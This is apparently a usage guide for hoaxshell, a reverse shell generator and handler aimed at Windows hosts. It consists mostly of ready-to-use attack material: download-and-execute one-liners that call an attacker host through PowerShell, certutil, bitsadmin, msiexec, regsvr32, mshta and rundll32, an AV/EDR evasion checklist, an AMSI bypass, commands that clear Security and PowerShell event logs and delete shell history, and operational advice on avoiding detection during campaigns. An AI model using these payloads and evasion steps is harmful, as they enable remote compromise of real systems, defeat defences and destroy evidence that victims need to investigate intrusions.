hoaxshell

Overview

hoaxshell is a Python-based reverse shell generator and handler that leverages legitimate Windows utilities (certutil, PowerShell, cmd) to establish encrypted reverse shells. It bypasses traditional AV/EDR detection through encrypted traffic, legitimate process chains, and unconventional execution methods.

Key Features:

• Encrypted reverse shell connections (AES-256)
• Multiple payload delivery mechanisms
• HTTPS support with certificate handling
• Session management and interactive shell
• Low AV/EDR detection rates
• Supports staged and stageless payloads

Installation

# Clone the repository
git clone https://github.com/t3l3machus/hoaxshell.git
cd hoaxshell

# Install Python dependencies
pip3 install -r requirements.txt

# Make executable
chmod +x hoaxshell.py

Requirements:

• Python 3.7+
• requests library
• Windows target system
• Network connectivity (C2 → Target)

Handler Setup

# Start the hoaxshell handler
python3 hoaxshell.py

# Listen on specific IP/port
python3 hoaxshell.py -s <IP> -p <PORT>

# Use HTTPS with certificate
python3 hoaxshell.py -s <IP> -p <PORT> --ssl --cert /path/to/cert.pem --key /path/to/key.pem

# Specify encryption key (for reproducibility)
python3 hoaxshell.py -s <IP> -p <PORT> -k <ENCRYPTION_KEY>

# Verbose output
python3 hoaxshell.py -s <IP> -p <PORT> -v

Handler Options:

Option	Description
-s, --server	Listener IP address (default: 0.0.0.0)
-p, --port	Listener port (default: 8888)
--ssl	Enable HTTPS/TLS
--cert	Path to SSL certificate
--key	Path to SSL private key
-k, --key	Custom encryption key (32 bytes)
-v, --verbose	Verbose logging

Payload Generation

PowerShell Payload (Recommended)

# Basic PowerShell reverse shell
$ip='<ATTACKER_IP>'; $port=<PORT>; $key='<ENCRYPTION_KEY>'; iex(New-Object System.Net.WebClient).DownloadString('http://<ATTACKER_IP>:<PORT>/path/to/payload')

# Direct execution
powershell -Command "IEX(New-Object System.Net.WebClient).DownloadString('http://<ATTACKER_IP>:<PORT>/<SESSION_ID>')"

# Obfuscated execution
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "IEX(New-Object System.Net.WebClient).DownloadString('http://<ATTACKER_IP>:<PORT>/<SESSION_ID>')"

CMD-Based Payload

# Using certutil for file download + execution
certutil -urlcache -split -f "http://<ATTACKER_IP>:<PORT>/<SESSION_ID>" c:\windows\temp\shell.ps1 && powershell -File c:\windows\temp\shell.ps1

# One-liner
cmd /c "certutil -urlcache -split -f http://<ATTACKER_IP>:<PORT>/<SESSION_ID> %temp%\s.ps1 && powershell -File %temp%\s.ps1"

certutil Direct Execution

# Download and execute in memory
certutil -urlcache -f "http://<ATTACKER_IP>:<PORT>/download" || powershell -Command "IEX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((New-Object System.Net.WebClient).DownloadString('http://<ATTACKER_IP>:<PORT>/<SESSION_ID>'))))"

Generated Session ID Payload

The handler generates unique payloads with embedded session IDs:

# View generated payloads
# Displayed in handler output after startup
# Format: http://<LISTENER>:<PORT>/<SESSION_ID>

# Each payload contains:
# - Unique session identifier
# - Encrypted communication protocol
# - AES-256 key embedded (if not randomized)

Handler Commands

Once a session connects, interact with the reverse shell:

Command	Description
help	Display available commands
sessions	List active sessions
interact <ID>	Switch to session ID
exec <command>	Execute command in current session
pwd	Print working directory
cd <path>	Change directory
exit	Close current session
kill <ID>	Terminate session
clear	Clear screen

Interactive Shell Example:

[+] Session 1 connected (192.168.1.100:54321)
hoaxshell> interact 1
[*] Interacting with Session 1
Session_1> whoami
DOMAIN\username
Session_1> ipconfig /all
[output]

Encryption & Protocol

AES-256 Encryption

• Algorithm: AES-256-CBC
• Mode: CBC with PKCS7 padding
• IV: Randomly generated per request
• Key Exchange: Pre-shared (embedded in payload or handler)

Traffic Flow:

Client: Encrypted(Command) → Server:PORT
Server: Encrypted(Response) → Client

HTTPS Support

# Generate self-signed certificate
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

# Run handler with HTTPS
python3 hoaxshell.py -s <IP> -p <PORT> --ssl --cert cert.pem --key key.pem

Update payload to use HTTPS:

$ip='<ATTACKER_IP>'; $port=<PORT>;
[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true}
iex(New-Object System.Net.WebClient).DownloadString('https://<ATTACKER_IP>:<PORT>/<SESSION_ID>')

Session Management

Viewing Active Sessions

hoaxshell> sessions
[*] Active sessions:
    [1] 192.168.1.100:54321 (Windows 10 - Administrator)
    [2] 192.168.1.101:54322 (Windows Server 2019 - System)

Grabbing Sessions

# Get output from last command
hoaxshell> grab

# Force refresh session data
hoaxshell> grab --force

# Get session info
hoaxshell> info <SESSION_ID>

Command Execution

# Execute single command
hoaxshell> exec whoami
DOMAIN\username

# Multi-line commands
hoaxshell> exec "Get-Process | Select-Object Name, CPU | Sort CPU -Descending | Select -First 10"

# Command output redirection
hoaxshell> exec "ipconfig > c:\windows\temp\ip.txt"

Evasion Techniques

Process Whitelisting Bypass

# Execution via rundll32
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write(new ActiveXObject("WScript.Shell").Exec("powershell -Command ...").StdOut.ReadAll());

# Execution via mshta
mshta vbscript:CreateObject("WScript.Shell").Run("powershell -Command ...",0)(window.close)

# Execution via regsvcs
regsvcs.exe C:\path\to\assembly.dll

Living Off The Land (LOLBins)

# certutil for download
certutil -urlcache -f "http://attacker:port/payload" c:\temp\s.exe

# bitsadmin alternative
bitsadmin /transfer job /download /resume "http://attacker:port/payload" c:\temp\s.exe

# msiexec execution
msiexec /i "http://attacker:port/payload.msi"

# regsvr32 + scrobj.dll
regsvr32 /s /n /u /i:http://attacker:port/payload.sct scrobj.dll

AV/EDR Evasion Checklist

Technique	Implementation
Traffic Encryption	AES-256 in hoaxshell (enabled by default)
HTTPS	Use --ssl flag with valid certificates
Process Injection	Execute from legitimate processes (PowerShell, cmd, rundll32)
Obfuscation	Use -NoP -NonI -W Hidden -Exec Bypass in PowerShell
Anti-Sandbox	Check for VM artifacts before execution
Beacon Timing	Randomize callback intervals in custom variants
Code Signing	Sign payloads with valid certificates

Shell Types & Features

Interactive PowerShell Shell

# Default behavior - full PowerShell environment
Session_1> $PSVersionTable
PSVersion      5.1.19041.1387

Session_1> Get-Credential
# Prompt for credentials (interactive)

Restricted Shells

# CMD shell access
Session_1> cmd /c whoami

# Constrained language mode detection
Session_1> $ExecutionContext.SessionState.LanguageMode
FullLanguage

File Operations

# Upload file to target
hoaxshell> upload /local/path/file.exe c:\windows\temp\file.exe

# Download file from target
hoaxshell> download c:\windows\temp\output.txt /local/path/output.txt

Constraints & Limitations

Network Restrictions

Constraint	Impact	Workaround
Firewalls	Outbound connections blocked	Use HTTP/443, proxy chaining
Proxy Requirements	Handler unreachable directly	Configure system proxy, CONNECT tunneling
DNS Filtering	Domain blocked	Use IP-based callbacks, DNS tunneling

Detection Vectors

• Network Signatures: Unusual HTTP User-Agents, abnormal certificate patterns
• Behavioral: certutil download activity, PowerShell conhost spawning
• Registry: PowerShell execution policy changes, script block logging
• EDR Telemetry: API call patterns, module loading

Operational Constraints

• Persistence: No built-in persistence mechanism (use separate implant)
• Lateral Movement: Limited by initial compromise privilege
• Detection Window: EDR hooks may block execution mid-session
• Code Execution: AMSI may block obfuscated code without bypass

OPSEC Considerations

Best Practices

# 1. Use HTTPS with valid certificates
python3 hoaxshell.py -s <IP> -p 443 --ssl --cert legit.pem --key legit.key

# 2. Minimize command history
hoaxshell> history clear

# 3. Use unique encryption keys per campaign
python3 hoaxshell.py -k $(openssl rand -hex 16)

# 4. Clean up artifacts on exit
Session_1> Remove-Item c:\windows\temp\*.ps1 -Force

Logging Evasion

# Disable PowerShell history
Set-PSReadLineKeyHandler -Key Tab -Function MenuComplete
Remove-Item (Get-PSReadlineOption).HistorySavePath

# Disable audit logging (if admin)
wevtutil cl Security
wevtutil cl PowerShell

# Disable AMSI (bypass)
[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiInitFailed","NonPublic,Static").SetValue($null,$true)

Network Hygiene

• Randomize callback intervals in modified versions
• Use legitimate-looking User-Agents
• Blend traffic with normal HTTP patterns
• Consider proxy redirection vs direct connections
• Rotate listener IPs/ports between engagements

Troubleshooting

Handler Connectivity Issues

# Test network access
python3 -c "import socket; s=socket.socket(); s.connect(('<IP>', <PORT>))"

# Enable verbose logging
python3 hoaxshell.py -s 0.0.0.0 -p 8888 -v

# Check firewall rules
netstat -tlnp | grep 8888

Payload Execution Failures

# Test script execution
powershell -ExecutionPolicy Bypass -NoProfile -Command "whoami"

# Verify connectivity from target
(New-Object System.Net.WebClient).DownloadString('http://<ATTACKER_IP>:<PORT>')

# Check proxy settings
netsh winhttp show proxy

Session Drops

• Increase reconnection timeout in handler
• Verify target-to-C2 network path
• Check encryption key consistency
• Review EDR/AV logs for blocking activity

References

• GitHub: github.com/t3l3machus/hoaxshell
• Living Off The Land: lolbas-project.github.io
• Windows AV/EDR Evasion: attacktorium.com/blog/av-evasion
• PowerShell Obfuscation: github.com/danielbohannon/Invoke-Obfuscation